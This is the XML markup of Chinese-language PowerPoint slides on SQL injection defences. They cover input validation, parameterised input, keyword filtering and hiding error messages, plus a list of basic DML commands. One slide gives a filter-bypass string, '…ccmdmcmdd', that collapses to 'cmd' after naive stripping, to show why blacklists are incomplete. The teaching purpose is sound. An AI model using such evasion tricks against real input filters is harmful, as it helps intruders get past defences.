        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3732961" y="3719970"/>
            <a:ext cx="7024254" cy="822761"/>
            <a:chOff x="3746790" y="3253171"/>
            <a:chExt cx="7024254" cy="822761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="文本框 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="3432534"/>
              <a:ext cx="52220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封装客户端提交信息</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40" name="直接连接符 39"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="3663959"/>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746790" y="3253171"/>
              <a:ext cx="954108" cy="822761"/>
              <a:chOff x="2357449" y="4572440"/>
              <a:chExt cx="954108" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="六边形 35"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2357449" y="4572440"/>
                <a:ext cx="954108" cy="822761"/>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p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2659307" y="4782580"/>
                <a:ext cx="338555" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyP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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="组合 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3732961" y="4753422"/>
            <a:ext cx="8134805" cy="822761"/>
            <a:chOff x="3746790" y="4286623"/>
            <a:chExt cx="8134805" cy="822761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="文本框 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="4466579"/>
              <a:ext cx="633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替换或删除敏感字符</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字符串</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42" name="直接连接符 41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="4698004"/>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3746790" y="4286623"/>
              <a:ext cx="954108" cy="822761"/>
              <a:chOff x="2357449" y="2676317"/>
              <a:chExt cx="954108" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="六边形 43"/>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矩形 44"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2674273" y="2887049"/>
                <a:ext cx="338555" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyP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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1191829" y="3405216"/>
            <a:ext cx="2275030" cy="2275030"/>
            <a:chOff x="1230579" y="2525851"/>
            <a:chExt cx="2275030" cy="2275030"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="52" name="组合 51"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1230579" y="2525851"/>
              <a:ext cx="2275030" cy="2275030"/>
              <a:chOff x="2716147" y="2106202"/>
              <a:chExt cx="1622946" cy="1622946"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="is1ide-Oval 8"/>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55" name="is1ide-Oval 8"/>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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1474812" y="3368046"/>
              <a:ext cx="1872640" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyP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注入防御措施</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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="组合 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3742217" y="5798736"/>
            <a:ext cx="8134805" cy="822761"/>
            <a:chOff x="3746790" y="4286623"/>
            <a:chExt cx="8134805" cy="822761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="文本框 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5548979" y="4466579"/>
              <a:ext cx="6332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屏蔽出错信息</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39" name="直接连接符 38"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824692" y="4698004"/>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3746790" y="4286623"/>
              <a:ext cx="954108" cy="822761"/>
              <a:chOff x="2357449" y="2676317"/>
              <a:chExt cx="954108" cy="822761"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="六边形 46"/>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矩形 47"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2674273" y="2887049"/>
                <a:ext cx="338555" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ct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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="22" presetClass="entr" presetSubtype="8"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163375" y="837929"/>
            <a:ext cx="4532010" cy="474140"/>
            <a:chOff x="4163375" y="837929"/>
            <a:chExt cx="4532010"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163375" y="837929"/>
              <a:ext cx="4532010"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对提交数据的合法性进行检查</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956767" y="1528093"/>
            <a:ext cx="11161240" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方 案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>被公认是最根本的解决方案，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在确认客户端的输入合法之前，服务端拒绝进行关键性的处理操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，不过这需要开发者能够以一种安全的方式来构建网络应用程序，虽然已有大量针对在网络应用程序开发中如何安全地访问数据库的文档出版，但仍然有很多开发者缺乏足够的安全意识，造成开发出的产品中依旧存在注入漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100"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4886934" y="4081684"/>
            <a:ext cx="3300905" cy="474140"/>
            <a:chOff x="4778928" y="837929"/>
            <a:chExt cx="3300905" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="7"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78928" y="837929"/>
              <a:ext cx="3300905"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封装客户端提交信息</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1100783" y="4689370"/>
            <a:ext cx="11161240" cy="581057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的做法需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>RDBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的支持，目前只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>采用该技术</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251540" y="837929"/>
            <a:ext cx="4355680" cy="474140"/>
            <a:chOff x="4251540" y="837929"/>
            <a:chExt cx="4355680"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251540" y="837929"/>
              <a:ext cx="4355680"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替换或删除敏感字符</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956767" y="1528093"/>
            <a:ext cx="11161240" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>则是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一种不完全的解决措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，例如，当客户端的输入为 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ccmdmcmdd</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时，在对敏感字符串“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cmd</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替换删除以后，剩下的字符正好是“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cmd</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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100"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5166502" y="2845841"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="7"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240594" y="837929"/>
              <a:ext cx="2377574" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyP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屏蔽出错信息</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956767" y="3453527"/>
            <a:ext cx="11161240" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>是目前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>最常被采用的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，很多安全文档都认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入攻击需要通过错误信息收集信息，有些甚至声称某些特殊的任务若缺乏详细的错误信息则不能完成，这使很多安全专家形成一种观念，即注入攻击在缺乏详细错误的情况下不能实施。而实际上，屏蔽错误信息是在服务端处理完毕之后进行补救，攻击其实已经发生，只是企图阻止攻击者知道攻击的结果而已。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4341143" y="6449394"/>
            <a:ext cx="4801314" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN"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通常，上面这些方法需要结合使用</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5066663" y="837929"/>
            <a:ext cx="2725426" cy="474140"/>
            <a:chOff x="5066663" y="837929"/>
            <a:chExt cx="2725426"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66663" y="837929"/>
              <a:ext cx="2725426"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DML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的主要指令有</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 name="组合 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1172791" y="1772220"/>
            <a:ext cx="4904706" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="矩形 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>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 name="矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3326486" y="2063504"/>
              <a:ext cx="1156855"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SELECT</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5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3533749" y="1814459"/>
            <a:ext cx="2492991" cy="635596"/>
            <a:chOff x="4957141" y="1930372"/>
            <a:chExt cx="3075935" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="矩形 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>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957141" y="2063504"/>
              <a:ext cx="3075935"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从数据库表中获取数据</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="组合 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6760009" y="1770698"/>
            <a:ext cx="4904706" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 30"/>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矩形 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3267290" y="2063504"/>
              <a:ext cx="1205994"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UPDATE</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33" name="组合 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9120966" y="1812937"/>
            <a:ext cx="2492990" cy="635596"/>
            <a:chOff x="4957141" y="1930372"/>
            <a:chExt cx="3075934" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="矩形 33"/>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957141" y="2063504"/>
              <a:ext cx="3075934"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更新数据库表中的数据</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="组合 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1172791" y="2680226"/>
            <a:ext cx="4904706" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="矩形 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="72007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8" name="矩形 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3322424" y="2063504"/>
              <a:ext cx="1185634" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>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DELETE</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39" name="组合 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3533747" y="2722465"/>
            <a:ext cx="2492991" cy="635596"/>
            <a:chOff x="4957139" y="1930372"/>
            <a:chExt cx="3075935" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="6355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957139" y="2063504"/>
              <a:ext cx="3075935"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从数据库表中删除数据</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="组合 41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6767649" y="2674209"/>
            <a:ext cx="4904706" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="矩形 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>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4" name="矩形 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2999129" y="2063504"/>
              <a:ext cx="1883560" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ct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INSERT INTO </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45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9128607" y="2716448"/>
            <a:ext cx="2492991" cy="635596"/>
            <a:chOff x="4957141" y="1930372"/>
            <a:chExt cx="3075935" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="矩形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>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957141" y="2063504"/>
